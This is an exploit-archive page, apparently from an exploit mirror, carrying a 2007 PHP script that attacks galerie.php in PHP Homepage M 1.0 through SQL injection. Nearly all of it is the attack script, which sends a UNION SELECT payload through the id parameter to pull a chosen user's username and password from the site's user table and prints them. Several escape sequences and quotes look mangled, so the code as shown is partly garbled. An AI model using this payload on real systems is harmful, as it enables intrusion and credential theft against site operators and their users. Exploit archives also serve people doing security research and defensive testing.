PHP Homepage M 1.0 galerie.php Remote SQL Injection Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP Homepage M 1.0 galerie.php Remote SQL Injection Exploit
# Published : 2007-10-08
# Author : [PHCN] Mahjong
# Previous Title : TorrentTrader Classic 1.07 Multiple Remote Vulnerabilities
# Next Title : xKiosk 3.0.1i (xkurl.php PEARPATH) Remote File Inclusion Vulnerability

<?php
if ($argv[1] == '')
{
echo "--PHP Homepage M V.1.0 galerie.php Exploit----n";
echo "only with magic_quotes_gpc OFFn";
echo "by [PHCN] Mahjongn";
echo "Usage : phpHPmv1.php http://127.0.0.1 / 1n";
echo '----------------------------------------------';
}
else
{
$host = $argv[1];
$path = $argv[2];
$userid = $argv[3];

$data = $host.$path."galerie.php?act=show&id=99999'+UNION+SELECT+username,passwort,passwort,passwort+FROM+user+WHERE+U ID='$userid";
$data = file_get_contents($data);
$pw = substr($data,strpos($data,'<img border="0" src='bilder/')+28,30);
$pw = explode('.',$pw);
$pw = $pw[0];
$user = substr($data,strpos($data,'UID=''.$userid.''<h1 align="center">',30));
$user = explode('>',$user);
$user = strrev($user[1]);
$user = substr($user,4,100);
$user = strrev($user);

echo "--EXPLOIT FINISHED--n";
echo "userid : $useridn";
echo "username: $usern";
echo "password: $pwn";
echo '--------------------';
}


?>

# www.Syue.com [2007-10-08]